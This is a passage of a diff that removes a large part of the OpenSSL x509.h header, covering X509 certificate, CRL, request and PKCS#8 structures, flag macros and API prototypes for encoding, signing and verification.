-	} /* X509_ALGOR */;
-
-
-typedef STACK_OF(X509_ALGOR) X509_ALGORS;
-
-typedef struct X509_val_st
-	{
-	ASN1_TIME *notBefore;
-	ASN1_TIME *notAfter;
-	} X509_VAL;
-
-struct X509_pubkey_st
-	{
-	X509_ALGOR *algor;
-	ASN1_BIT_STRING *public_key;
-	EVP_PKEY *pkey;
-	};
-
-typedef struct X509_sig_st
-	{
-	X509_ALGOR *algor;
-	ASN1_OCTET_STRING *digest;
-	} X509_SIG;
-
-typedef struct X509_name_entry_st
-	{
-	ASN1_OBJECT *object;
-	ASN1_STRING *value;
-	int set;
-	int size; 	/* temp variable */
-	} X509_NAME_ENTRY;
-
-DECLARE_STACK_OF(X509_NAME_ENTRY)
-
-/* we always keep X509_NAMEs in 2 forms. */
-struct X509_name_st
-	{
-	STACK_OF(X509_NAME_ENTRY) *entries;
-	int modified;	/* true if 'bytes' needs to be built */
-#ifndef OPENSSL_NO_BUFFER
-	BUF_MEM *bytes;
-#else
-	char *bytes;
-#endif
-/*	unsigned long hash; Keep the hash around for lookups */
-	unsigned char *canon_enc;
-	int canon_enclen;
-	} /* X509_NAME */;
-
-DECLARE_STACK_OF(X509_NAME)
-
-#define X509_EX_V_NETSCAPE_HACK		0x8000
-#define X509_EX_V_INIT			0x0001
-typedef struct X509_extension_st
-	{
-	ASN1_OBJECT *object;
-	ASN1_BOOLEAN critical;
-	ASN1_OCTET_STRING *value;
-	} X509_EXTENSION;
-
-typedef STACK_OF(X509_EXTENSION) X509_EXTENSIONS;
-
-DECLARE_STACK_OF(X509_EXTENSION)
-
-/* a sequence of these are used */
-typedef struct x509_attributes_st
-	{
-	ASN1_OBJECT *object;
-	int single; /* 0 for a set, 1 for a single item (which is wrong) */
-	union	{
-		char		*ptr;
-/* 0 */		STACK_OF(ASN1_TYPE) *set;
-/* 1 */		ASN1_TYPE	*single;
-		} value;
-	} X509_ATTRIBUTE;
-
-DECLARE_STACK_OF(X509_ATTRIBUTE)
-
-
-typedef struct X509_req_info_st
-	{
-	ASN1_ENCODING enc;
-	ASN1_INTEGER *version;
-	X509_NAME *subject;
-	X509_PUBKEY *pubkey;
-	/*  d=2 hl=2 l=  0 cons: cont: 00 */
-	STACK_OF(X509_ATTRIBUTE) *attributes; /* [ 0 ] */
-	} X509_REQ_INFO;
-
-typedef struct X509_req_st
-	{
-	X509_REQ_INFO *req_info;
-	X509_ALGOR *sig_alg;
-	ASN1_BIT_STRING *signature;
-	int references;
-	} X509_REQ;
-
-typedef struct x509_cinf_st
-	{
-	ASN1_INTEGER *version;		/* [ 0 ] default of v1 */
-	ASN1_INTEGER *serialNumber;
-	X509_ALGOR *signature;
-	X509_NAME *issuer;
-	X509_VAL *validity;
-	X509_NAME *subject;
-	X509_PUBKEY *key;
-	ASN1_BIT_STRING *issuerUID;		/* [ 1 ] optional in v2 */
-	ASN1_BIT_STRING *subjectUID;		/* [ 2 ] optional in v2 */
-	STACK_OF(X509_EXTENSION) *extensions;	/* [ 3 ] optional in v3 */
-	ASN1_ENCODING enc;
-	} X509_CINF;
-
-/* This stuff is certificate "auxiliary info"
- * it contains details which are useful in certificate
- * stores and databases. When used this is tagged onto
- * the end of the certificate itself
- */
-
-typedef struct x509_cert_aux_st
-	{
-	STACK_OF(ASN1_OBJECT) *trust;		/* trusted uses */
-	STACK_OF(ASN1_OBJECT) *reject;		/* rejected uses */
-	ASN1_UTF8STRING *alias;			/* "friendly name" */
-	ASN1_OCTET_STRING *keyid;		/* key id of private key */
-	STACK_OF(X509_ALGOR) *other;		/* other unspecified info */
-	} X509_CERT_AUX;
-
-struct x509_st
-	{
-	X509_CINF *cert_info;
-	X509_ALGOR *sig_alg;
-	ASN1_BIT_STRING *signature;
-	int valid;
-	int references;
-	char *name;
-	CRYPTO_EX_DATA ex_data;
-	/* These contain copies of various extension values */
-	long ex_pathlen;
-	long ex_pcpathlen;
-	unsigned long ex_flags;
-	unsigned long ex_kusage;
-	unsigned long ex_xkusage;
-	unsigned long ex_nscert;
-	ASN1_OCTET_STRING *skid;
-	AUTHORITY_KEYID *akid;
-	X509_POLICY_CACHE *policy_cache;
-	STACK_OF(DIST_POINT) *crldp;
-	STACK_OF(GENERAL_NAME) *altname;
-	NAME_CONSTRAINTS *nc;
-#ifndef OPENSSL_NO_SHA
-	unsigned char sha1_hash[SHA_DIGEST_LENGTH];
-#endif
-	X509_CERT_AUX *aux;
-	} /* X509 */;
-
-DECLARE_STACK_OF(X509)
-
-/* This is used for a table of trust checking functions */
-
-typedef struct x509_trust_st {
-	int trust;
-	int flags;
-	int (*check_trust)(struct x509_trust_st *, X509 *, int);
-	char *name;
-	int arg1;
-	void *arg2;
-} X509_TRUST;
-
-DECLARE_STACK_OF(X509_TRUST)
-
-typedef struct x509_cert_pair_st {
-	X509 *forward;
-	X509 *reverse;
-} X509_CERT_PAIR;
-
-/* standard trust ids */
-
-#define X509_TRUST_DEFAULT	-1	/* Only valid in purpose settings */
-
-#define X509_TRUST_COMPAT	1
-#define X509_TRUST_SSL_CLIENT	2
-#define X509_TRUST_SSL_SERVER	3
-#define X509_TRUST_EMAIL	4
-#define X509_TRUST_OBJECT_SIGN	5
-#define X509_TRUST_OCSP_SIGN	6
-#define X509_TRUST_OCSP_REQUEST	7
-#define X509_TRUST_TSA		8
-
-/* Keep these up to date! */
-#define X509_TRUST_MIN		1
-#define X509_TRUST_MAX		8
-
-
-/* trust_flags values */
-#define	X509_TRUST_DYNAMIC 	1
-#define	X509_TRUST_DYNAMIC_NAME	2
-
-/* check_trust return codes */
-
-#define X509_TRUST_TRUSTED	1
-#define X509_TRUST_REJECTED	2
-#define X509_TRUST_UNTRUSTED	3
-
-/* Flags for X509_print_ex() */
-
-#define	X509_FLAG_COMPAT		0
-#define	X509_FLAG_NO_HEADER		1L
-#define	X509_FLAG_NO_VERSION		(1L << 1)
-#define	X509_FLAG_NO_SERIAL		(1L << 2)
-#define	X509_FLAG_NO_SIGNAME		(1L << 3)
-#define	X509_FLAG_NO_ISSUER		(1L << 4)
-#define	X509_FLAG_NO_VALIDITY		(1L << 5)
-#define	X509_FLAG_NO_SUBJECT		(1L << 6)
-#define	X509_FLAG_NO_PUBKEY		(1L << 7)
-#define	X509_FLAG_NO_EXTENSIONS		(1L << 8)
-#define	X509_FLAG_NO_SIGDUMP		(1L << 9)
-#define	X509_FLAG_NO_AUX		(1L << 10)
-#define	X509_FLAG_NO_ATTRIBUTES		(1L << 11)
-
-/* Flags specific to X509_NAME_print_ex() */	
-
-/* The field separator information */
-
-#define XN_FLAG_SEP_MASK	(0xf << 16)
-
-#define XN_FLAG_COMPAT		0		/* Traditional SSLeay: use old X509_NAME_print */
-#define XN_FLAG_SEP_COMMA_PLUS	(1 << 16)	/* RFC2253 ,+ */
-#define XN_FLAG_SEP_CPLUS_SPC	(2 << 16)	/* ,+ spaced: more readable */
-#define XN_FLAG_SEP_SPLUS_SPC	(3 << 16)	/* ;+ spaced */
-#define XN_FLAG_SEP_MULTILINE	(4 << 16)	/* One line per field */
-
-#define XN_FLAG_DN_REV		(1 << 20)	/* Reverse DN order */
-
-/* How the field name is shown */
-
-#define XN_FLAG_FN_MASK		(0x3 << 21)
-
-#define XN_FLAG_FN_SN		0		/* Object short name */
-#define XN_FLAG_FN_LN		(1 << 21)	/* Object long name */
-#define XN_FLAG_FN_OID		(2 << 21)	/* Always use OIDs */
-#define XN_FLAG_FN_NONE		(3 << 21)	/* No field names */
-
-#define XN_FLAG_SPC_EQ		(1 << 23)	/* Put spaces round '=' */
-
-/* This determines if we dump fields we don't recognise:
- * RFC2253 requires this.
- */
-
-#define XN_FLAG_DUMP_UNKNOWN_FIELDS (1 << 24)
-
-#define XN_FLAG_FN_ALIGN	(1 << 25)	/* Align field names to 20 characters */
-
-/* Complete set of RFC2253 flags */
-
-#define XN_FLAG_RFC2253 (ASN1_STRFLGS_RFC2253 | \
-			XN_FLAG_SEP_COMMA_PLUS | \
-			XN_FLAG_DN_REV | \
-			XN_FLAG_FN_SN | \
-			XN_FLAG_DUMP_UNKNOWN_FIELDS)
-
-/* readable oneline form */
-
-#define XN_FLAG_ONELINE (ASN1_STRFLGS_RFC2253 | \
-			ASN1_STRFLGS_ESC_QUOTE | \
-			XN_FLAG_SEP_CPLUS_SPC | \
-			XN_FLAG_SPC_EQ | \
-			XN_FLAG_FN_SN)
-
-/* readable multiline form */
-
-#define XN_FLAG_MULTILINE (ASN1_STRFLGS_ESC_CTRL | \
-			ASN1_STRFLGS_ESC_MSB | \
-			XN_FLAG_SEP_MULTILINE | \
-			XN_FLAG_SPC_EQ | \
-			XN_FLAG_FN_LN | \
-			XN_FLAG_FN_ALIGN)
-
-struct x509_revoked_st
-	{
-	ASN1_INTEGER *serialNumber;
-	ASN1_TIME *revocationDate;
-	STACK_OF(X509_EXTENSION) /* optional */ *extensions;
-	/* Set up if indirect CRL */
-	STACK_OF(GENERAL_NAME) *issuer;
-	/* Revocation reason */
-	int reason;
-	int sequence; /* load sequence */
-	};
-
-DECLARE_STACK_OF(X509_REVOKED)
-
-typedef struct X509_crl_info_st
-	{
-	ASN1_INTEGER *version;
-	X509_ALGOR *sig_alg;
-	X509_NAME *issuer;
-	ASN1_TIME *lastUpdate;
-	ASN1_TIME *nextUpdate;
-	STACK_OF(X509_REVOKED) *revoked;
-	STACK_OF(X509_EXTENSION) /* [0] */ *extensions;
-	ASN1_ENCODING enc;
-	} X509_CRL_INFO;
-
-struct X509_crl_st
-	{
-	/* actual signature */
-	X509_CRL_INFO *crl;
-	X509_ALGOR *sig_alg;
-	ASN1_BIT_STRING *signature;
-	int references;
-	int flags;
-	/* Copies of various extensions */
-	AUTHORITY_KEYID *akid;
-	ISSUING_DIST_POINT *idp;
-	/* Convenient breakdown of IDP */
-	int idp_flags;
-	int idp_reasons;
-	/* CRL and base CRL numbers for delta processing */
-	ASN1_INTEGER *crl_number;
-	ASN1_INTEGER *base_crl_number;
-#ifndef OPENSSL_NO_SHA
-	unsigned char sha1_hash[SHA_DIGEST_LENGTH];
-#endif
-	STACK_OF(GENERAL_NAMES) *issuers;
-	const X509_CRL_METHOD *meth;
-	void *meth_data;
-	} /* X509_CRL */;
-
-DECLARE_STACK_OF(X509_CRL)
-
-typedef struct private_key_st
-	{
-	int version;
-	/* The PKCS#8 data types */
-	X509_ALGOR *enc_algor;
-	ASN1_OCTET_STRING *enc_pkey;	/* encrypted pub key */
-
-	/* When decrypted, the following will not be NULL */
-	EVP_PKEY *dec_pkey;
-
-	/* used to encrypt and decrypt */
-	int key_length;
-	char *key_data;
-	int key_free;	/* true if we should auto free key_data */
-
-	/* expanded version of 'enc_algor' */
-	EVP_CIPHER_INFO cipher;
-
-	int references;
-	} X509_PKEY;
-
-#ifndef OPENSSL_NO_EVP
-typedef struct X509_info_st
-	{
-	X509 *x509;
-	X509_CRL *crl;
-	X509_PKEY *x_pkey;
-
-	EVP_CIPHER_INFO enc_cipher;
-	int enc_len;
-	char *enc_data;
-
-	int references;
-	} X509_INFO;
-
-DECLARE_STACK_OF(X509_INFO)
-#endif
-
-/* The next 2 structures and their 8 routines were sent to me by
- * Pat Richard <patr@x509.com> and are used to manipulate
- * Netscapes spki structures - useful if you are writing a CA web page
- */
-typedef struct Netscape_spkac_st
-	{
-	X509_PUBKEY *pubkey;
-	ASN1_IA5STRING *challenge;	/* challenge sent in atlas >= PR2 */
-	} NETSCAPE_SPKAC;
-
-typedef struct Netscape_spki_st
-	{
-	NETSCAPE_SPKAC *spkac;	/* signed public key and challenge */
-	X509_ALGOR *sig_algor;
-	ASN1_BIT_STRING *signature;
-	} NETSCAPE_SPKI;
-
-/* Netscape certificate sequence structure */
-typedef struct Netscape_certificate_sequence
-	{
-	ASN1_OBJECT *type;
-	STACK_OF(X509) *certs;
-	} NETSCAPE_CERT_SEQUENCE;
-
-/* Unused (and iv length is wrong)
-typedef struct CBCParameter_st
-	{
-	unsigned char iv[8];
-	} CBC_PARAM;
-*/
-
-/* Password based encryption structure */
-
-typedef struct PBEPARAM_st {
-ASN1_OCTET_STRING *salt;
-ASN1_INTEGER *iter;
-} PBEPARAM;
-
-/* Password based encryption V2 structures */
-
-typedef struct PBE2PARAM_st {
-X509_ALGOR *keyfunc;
-X509_ALGOR *encryption;
-} PBE2PARAM;
-
-typedef struct PBKDF2PARAM_st {
-ASN1_TYPE *salt;	/* Usually OCTET STRING but could be anything */
-ASN1_INTEGER *iter;
-ASN1_INTEGER *keylength;
-X509_ALGOR *prf;
-} PBKDF2PARAM;
-
-
-/* PKCS#8 private key info structure */
-
-struct pkcs8_priv_key_info_st
-        {
-        int broken;     /* Flag for various broken formats */
-#define PKCS8_OK		0
-#define PKCS8_NO_OCTET		1
-#define PKCS8_EMBEDDED_PARAM	2
-#define PKCS8_NS_DB		3
-#define PKCS8_NEG_PRIVKEY	4
-        ASN1_INTEGER *version;
-        X509_ALGOR *pkeyalg;
-        ASN1_TYPE *pkey; /* Should be OCTET STRING but some are broken */
-        STACK_OF(X509_ATTRIBUTE) *attributes;
-        };
-
-#ifdef  __cplusplus
-}
-#endif
-
-#include <openssl/x509_vfy.h>
-#include <openssl/pkcs7.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define X509_EXT_PACK_UNKNOWN	1
-#define X509_EXT_PACK_STRING	2
-
-#define		X509_get_version(x) ASN1_INTEGER_get((x)->cert_info->version)
-/* #define	X509_get_serialNumber(x) ((x)->cert_info->serialNumber) */
-#define		X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
-#define		X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
-#define		X509_extract_key(x)	X509_get_pubkey(x) /*****/
-#define		X509_REQ_get_version(x) ASN1_INTEGER_get((x)->req_info->version)
-#define		X509_REQ_get_subject_name(x) ((x)->req_info->subject)
-#define		X509_REQ_extract_key(a)	X509_REQ_get_pubkey(a)
-#define		X509_name_cmp(a,b)	X509_NAME_cmp((a),(b))
-#define		X509_get_signature_type(x) EVP_PKEY_type(OBJ_obj2nid((x)->sig_alg->algorithm))
-
-#define		X509_CRL_get_version(x) ASN1_INTEGER_get((x)->crl->version)
-#define 	X509_CRL_get_lastUpdate(x) ((x)->crl->lastUpdate)
-#define 	X509_CRL_get_nextUpdate(x) ((x)->crl->nextUpdate)
-#define		X509_CRL_get_issuer(x) ((x)->crl->issuer)
-#define		X509_CRL_get_REVOKED(x) ((x)->crl->revoked)
-
-void X509_CRL_set_default_method(const X509_CRL_METHOD *meth);
-X509_CRL_METHOD *X509_CRL_METHOD_new(
-	int (*crl_init)(X509_CRL *crl),
-	int (*crl_free)(X509_CRL *crl),
-	int (*crl_lookup)(X509_CRL *crl, X509_REVOKED **ret,
-				ASN1_INTEGER *ser, X509_NAME *issuer),
-	int (*crl_verify)(X509_CRL *crl, EVP_PKEY *pk));
-void X509_CRL_METHOD_free(X509_CRL_METHOD *m);
-
-void X509_CRL_set_meth_data(X509_CRL *crl, void *dat);
-void *X509_CRL_get_meth_data(X509_CRL *crl);
-
-/* This one is only used so that a binary form can output, as in
- * i2d_X509_NAME(X509_get_X509_PUBKEY(x),&buf) */
-#define 	X509_get_X509_PUBKEY(x) ((x)->cert_info->key)
-
-
-const char *X509_verify_cert_error_string(long n);
-
-#ifndef OPENSSL_NO_EVP
-int X509_verify(X509 *a, EVP_PKEY *r);
-
-int X509_REQ_verify(X509_REQ *a, EVP_PKEY *r);
-int X509_CRL_verify(X509_CRL *a, EVP_PKEY *r);
-int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a, EVP_PKEY *r);
-
-NETSCAPE_SPKI * NETSCAPE_SPKI_b64_decode(const char *str, int len);
-char * NETSCAPE_SPKI_b64_encode(NETSCAPE_SPKI *x);
-EVP_PKEY *NETSCAPE_SPKI_get_pubkey(NETSCAPE_SPKI *x);
-int NETSCAPE_SPKI_set_pubkey(NETSCAPE_SPKI *x, EVP_PKEY *pkey);
-
-int NETSCAPE_SPKI_print(BIO *out, NETSCAPE_SPKI *spki);
-
-int X509_signature_dump(BIO *bp,const ASN1_STRING *sig, int indent);
-int X509_signature_print(BIO *bp,X509_ALGOR *alg, ASN1_STRING *sig);
-
-int X509_sign(X509 *x, EVP_PKEY *pkey, const EVP_MD *md);
-int X509_sign_ctx(X509 *x, EVP_MD_CTX *ctx);
-int X509_REQ_sign(X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md);
-int X509_REQ_sign_ctx(X509_REQ *x, EVP_MD_CTX *ctx);
-int X509_CRL_sign(X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md);
-int X509_CRL_sign_ctx(X509_CRL *x, EVP_MD_CTX *ctx);
-int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *x, EVP_PKEY *pkey, const EVP_MD *md);
-
-int X509_pubkey_digest(const X509 *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_digest(const X509 *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_CRL_digest(const X509_CRL *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_REQ_digest(const X509_REQ *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_NAME_digest(const X509_NAME *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-#endif
-
-X509 *d2i_X509_fp(FILE *fp, X509 **x509);
-int i2d_X509_fp(FILE *fp,X509 *x509);
-X509_CRL *d2i_X509_CRL_fp(FILE *fp,X509_CRL **crl);
-int i2d_X509_CRL_fp(FILE *fp,X509_CRL *crl);
-X509_REQ *d2i_X509_REQ_fp(FILE *fp,X509_REQ **req);
-int i2d_X509_REQ_fp(FILE *fp,X509_REQ *req);
-#ifndef OPENSSL_NO_RSA
-RSA *d2i_RSAPrivateKey_fp(FILE *fp,RSA **rsa);
-int i2d_RSAPrivateKey_fp(FILE *fp,RSA *rsa);
-RSA *d2i_RSAPublicKey_fp(FILE *fp,RSA **rsa);
-int i2d_RSAPublicKey_fp(FILE *fp,RSA *rsa);
-RSA *d2i_RSA_PUBKEY_fp(FILE *fp,RSA **rsa);
-int i2d_RSA_PUBKEY_fp(FILE *fp,RSA *rsa);
-#endif
-#ifndef OPENSSL_NO_DSA
-DSA *d2i_DSA_PUBKEY_fp(FILE *fp, DSA **dsa);
-int i2d_DSA_PUBKEY_fp(FILE *fp, DSA *dsa);
-int i2d_DSAPrivateKey_fp(FILE *fp, DSA *dsa);
-#endif
-#ifndef OPENSSL_NO_EC
-EC_KEY *d2i_EC_PUBKEY_fp(FILE *fp, EC_KEY **eckey);
-int   i2d_EC_PUBKEY_fp(FILE *fp, EC_KEY *eckey);
-EC_KEY *d2i_ECPrivateKey_fp(FILE *fp, EC_KEY **eckey);
-int   i2d_ECPrivateKey_fp(FILE *fp, EC_KEY *eckey);
-#endif
-X509_SIG *d2i_PKCS8_fp(FILE *fp,X509_SIG **p8);
-int i2d_PKCS8_fp(FILE *fp,X509_SIG *p8);
-PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,
-						PKCS8_PRIV_KEY_INFO **p8inf);
-int i2d_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,PKCS8_PRIV_KEY_INFO *p8inf);
-int i2d_PKCS8PrivateKeyInfo_fp(FILE *fp, EVP_PKEY *key);
-int i2d_PrivateKey_fp(FILE *fp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PrivateKey_fp(FILE *fp, EVP_PKEY **a);
-int i2d_PUBKEY_fp(FILE *fp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PUBKEY_fp(FILE *fp, EVP_PKEY **a);
-
-#ifndef OPENSSL_NO_BIO
-X509 *d2i_X509_bio(BIO *bp,X509 **x509);
-int i2d_X509_bio(BIO *bp,X509 *x509);
-X509_CRL *d2i_X509_CRL_bio(BIO *bp,X509_CRL **crl);
-int i2d_X509_CRL_bio(BIO *bp,X509_CRL *crl);
-X509_REQ *d2i_X509_REQ_bio(BIO *bp,X509_REQ **req);
-int i2d_X509_REQ_bio(BIO *bp,X509_REQ *req);
-#ifndef OPENSSL_NO_RSA
-RSA *d2i_RSAPrivateKey_bio(BIO *bp,RSA **rsa);
-int i2d_RSAPrivateKey_bio(BIO *bp,RSA *rsa);
-RSA *d2i_RSAPublicKey_bio(BIO *bp,RSA **rsa);
-int i2d_RSAPublicKey_bio(BIO *bp,RSA *rsa);
-RSA *d2i_RSA_PUBKEY_bio(BIO *bp,RSA **rsa);
-int i2d_RSA_PUBKEY_bio(BIO *bp,RSA *rsa);
-#endif
-#ifndef OPENSSL_NO_DSA
-DSA *d2i_DSA_PUBKEY_bio(BIO *bp, DSA **dsa);
-int i2d_DSA_PUBKEY_bio(BIO *bp, DSA *dsa);
-DSA *d2i_DSAPrivateKey_bio(BIO *bp, DSA **dsa);
-int i2d_DSAPrivateKey_bio(BIO *bp, DSA *dsa);
-#endif
-#ifndef OPENSSL_NO_EC
-EC_KEY *d2i_EC_PUBKEY_bio(BIO *bp, EC_KEY **eckey);
-int   i2d_EC_PUBKEY_bio(BIO *bp, EC_KEY *eckey);
-EC_KEY *d2i_ECPrivateKey_bio(BIO *bp, EC_KEY **eckey);
-int   i2d_ECPrivateKey_bio(BIO *bp, EC_KEY *eckey);
-#endif
-X509_SIG *d2i_PKCS8_bio(BIO *bp,X509_SIG **p8);
-int i2d_PKCS8_bio(BIO *bp,X509_SIG *p8);
-PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,
-						PKCS8_PRIV_KEY_INFO **p8inf);
-int i2d_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,PKCS8_PRIV_KEY_INFO *p8inf);
-int i2d_PKCS8PrivateKeyInfo_bio(BIO *bp, EVP_PKEY *key);
-int i2d_PrivateKey_bio(BIO *bp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PrivateKey_bio(BIO *bp, EVP_PKEY **a);
-int i2d_PUBKEY_bio(BIO *bp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PUBKEY_bio(BIO *bp, EVP_PKEY **a);
-#endif
-
-X509 *X509_dup(X509 *x509);
-X509_ATTRIBUTE *X509_ATTRIBUTE_dup(X509_ATTRIBUTE *xa);
-X509_EXTENSION *X509_EXTENSION_dup(X509_EXTENSION *ex);
-X509_CRL *X509_CRL_dup(X509_CRL *crl);
-X509_REQ *X509_REQ_dup(X509_REQ *req);
-X509_ALGOR *X509_ALGOR_dup(X509_ALGOR *xn);
-int X509_ALGOR_set0(X509_ALGOR *alg, ASN1_OBJECT *aobj, int ptype, void *pval);
-void X509_ALGOR_get0(ASN1_OBJECT **paobj, int *pptype, void **ppval,
-						X509_ALGOR *algor);
-void X509_ALGOR_set_md(X509_ALGOR *alg, const EVP_MD *md);
-int X509_ALGOR_cmp(const X509_ALGOR *a, const X509_ALGOR *b);
-
-X509_NAME *X509_NAME_dup(X509_NAME *xn);
-X509_NAME_ENTRY *X509_NAME_ENTRY_dup(X509_NAME_ENTRY *ne);
-
-int		X509_cmp_time(const ASN1_TIME *s, time_t *t);
-int		X509_cmp_current_time(const ASN1_TIME *s);
-ASN1_TIME *	X509_time_adj(ASN1_TIME *s, long adj, time_t *t);
-ASN1_TIME *	X509_time_adj_ex(ASN1_TIME *s,
-				int offset_day, long offset_sec, time_t *t);
-ASN1_TIME *	X509_gmtime_adj(ASN1_TIME *s, long adj);
-
-const char *	X509_get_default_cert_area(void );
-const char *	X509_get_default_cert_dir(void );
-const char *	X509_get_default_cert_file(void );
-const char *	X509_get_default_cert_dir_env(void );
-const char *	X509_get_default_cert_file_env(void );
-const char *	X509_get_default_private_dir(void );
-
-X509_REQ *	X509_to_X509_REQ(X509 *x, EVP_PKEY *pkey, const EVP_MD *md);
-X509 *		X509_REQ_to_X509(X509_REQ *r, int days,EVP_PKEY *pkey);
-
-X509_ALGOR *X509_ALGOR_new(void);
-void X509_ALGOR_free(X509_ALGOR *a);
-X509_ALGOR *d2i_X509_ALGOR(X509_ALGOR **a, const unsigned char **in, long len);
-int i2d_X509_ALGOR(X509_ALGOR *a, unsigned char **out);
-extern const ASN1_ITEM X509_ALGOR_it;
-X509_ALGORS *d2i_X509_ALGORS(X509_ALGORS **a, const unsigned char **in, long len);
-int i2d_X509_ALGORS(X509_ALGORS *a, unsigned char **out);
-extern const ASN1_ITEM X509_ALGORS_it;
-X509_VAL *X509_VAL_new(void);
-void X509_VAL_free(X509_VAL *a);
-X509_VAL *d2i_X509_VAL(X509_VAL **a, const unsigned char **in, long len);
-int i2d_X509_VAL(X509_VAL *a, unsigned char **out);
-extern const ASN1_ITEM X509_VAL_it;
-
-X509_PUBKEY *X509_PUBKEY_new(void);
-void X509_PUBKEY_free(X509_PUBKEY *a);
-X509_PUBKEY *d2i_X509_PUBKEY(X509_PUBKEY **a, const unsigned char **in, long len);
-int i2d_X509_PUBKEY(X509_PUBKEY *a, unsigned char **out);
-extern const ASN1_ITEM X509_PUBKEY_it;
-
-int		X509_PUBKEY_set(X509_PUBKEY **x, EVP_PKEY *pkey);
-EVP_PKEY *	X509_PUBKEY_get(X509_PUBKEY *key);
-int		X509_get_pubkey_parameters(EVP_PKEY *pkey,
-					   STACK_OF(X509) *chain);
-int		i2d_PUBKEY(EVP_PKEY *a,unsigned char **pp);
-EVP_PKEY *	d2i_PUBKEY(EVP_PKEY **a,const unsigned char **pp,
-			long length);
-#ifndef OPENSSL_NO_RSA
-int		i2d_RSA_PUBKEY(RSA *a,unsigned char **pp);
-RSA *		d2i_RSA_PUBKEY(RSA **a,const unsigned char **pp,
-			long length);
-#endif
-#ifndef OPENSSL_NO_DSA
-int		i2d_DSA_PUBKEY(DSA *a,unsigned char **pp);
-DSA *		d2i_DSA_PUBKEY(DSA **a,const unsigned char **pp,
-			long length);
-#endif
-#ifndef OPENSSL_NO_EC
-int		i2d_EC_PUBKEY(EC_KEY *a, unsigned char **pp);
-EC_KEY 		*d2i_EC_PUBKEY(EC_KEY **a, const unsigned char **pp,
-			long length);
-#endif
-
-X509_SIG *X509_SIG_new(void);
-void X509_SIG_free(X509_SIG *a);
-X509_SIG *d2i_X509_SIG(X509_SIG **a, const unsigned char **in, long len);
-int i2d_X509_SIG(X509_SIG *a, unsigned char **out);
-extern const ASN1_ITEM X509_SIG_it;
-X509_REQ_INFO *X509_REQ_INFO_new(void);
-void X509_REQ_INFO_free(X509_REQ_INFO *a);
-X509_REQ_INFO *d2i_X509_REQ_INFO(X509_REQ_INFO **a, const unsigned char **in, long len);
-int i2d_X509_REQ_INFO(X509_REQ_INFO *a, unsigned char **out);
-extern const ASN1_ITEM X509_REQ_INFO_it;
-X509_REQ *X509_REQ_new(void);
-void X509_REQ_free(X509_REQ *a);
-X509_REQ *d2i_X509_REQ(X509_REQ **a, const unsigned char **in, long len);
-int i2d_X509_REQ(X509_REQ *a, unsigned char **out);
-extern const ASN1_ITEM X509_REQ_it;
-
-X509_ATTRIBUTE *X509_ATTRIBUTE_new(void);
-void X509_ATTRIBUTE_free(X509_ATTRIBUTE *a);
-X509_ATTRIBUTE *d2i_X509_ATTRIBUTE(X509_ATTRIBUTE **a, const unsigned char **in, long len);
-int i2d_X509_ATTRIBUTE(X509_ATTRIBUTE *a, unsigned char **out);
-extern const ASN1_ITEM X509_ATTRIBUTE_it;
-X509_ATTRIBUTE *X509_ATTRIBUTE_create(int nid, int atrtype, void *value);
-
-X509_EXTENSION *X509_EXTENSION_new(void);
-void X509_EXTENSION_free(X509_EXTENSION *a);
-X509_EXTENSION *d2i_X509_EXTENSION(X509_EXTENSION **a, const unsigned char **in, long len);
-int i2d_X509_EXTENSION(X509_EXTENSION *a, unsigned char **out);
-extern const ASN1_ITEM X509_EXTENSION_it;
-X509_EXTENSIONS *d2i_X509_EXTENSIONS(X509_EXTENSIONS **a, const unsigned char **in, long len);
-int i2d_X509_EXTENSIONS(X509_EXTENSIONS *a, unsigned char **out);
-extern const ASN1_ITEM X509_EXTENSIONS_it;
-
-X509_NAME_ENTRY *X509_NAME_ENTRY_new(void);
-void X509_NAME_ENTRY_free(X509_NAME_ENTRY *a);
-X509_NAME_ENTRY *d2i_X509_NAME_ENTRY(X509_NAME_ENTRY **a, const unsigned char **in, long len);
-int i2d_X509_NAME_ENTRY(X509_NAME_ENTRY *a, unsigned char **out);
-extern const ASN1_ITEM X509_NAME_ENTRY_it;
-
-X509_NAME *X509_NAME_new(void);
-void X509_NAME_free(X509_NAME *a);
-X509_NAME *d2i_X509_NAME(X509_NAME **a, const unsigned char **in, long len);
-int i2d_X509_NAME(X509_NAME *a, unsigned char **out);
-extern const ASN1_ITEM X509_NAME_it;
-
-int		X509_NAME_set(X509_NAME **xn, X509_NAME *name);
-
-X509_CINF *X509_CINF_new(void);
-void X509_CINF_free(X509_CINF *a);
-X509_CINF *d2i_X509_CINF(X509_CINF **a, const unsigned char **in, long len);
-int i2d_X509_CINF(X509_CINF *a, unsigned char **out);
-extern const ASN1_ITEM X509_CINF_it;
-
-X509 *X509_new(void);
-void X509_free(X509 *a);
-X509 *d2i_X509(X509 **a, const unsigned char **in, long len);
-int i2d_X509(X509 *a, unsigned char **out);
-extern const ASN1_ITEM X509_it;
-X509_CERT_AUX *X509_CERT_AUX_new(void);
-void X509_CERT_AUX_free(X509_CERT_AUX *a);
-X509_CERT_AUX *d2i_X509_CERT_AUX(X509_CERT_AUX **a, const unsigned char **in, long len);
-int i2d_X509_CERT_AUX(X509_CERT_AUX *a, unsigned char **out);
-extern const ASN1_ITEM X509_CERT_AUX_it;
-
-X509_CERT_PAIR *X509_CERT_PAIR_new(void);
-void X509_CERT_PAIR_free(X509_CERT_PAIR *a);
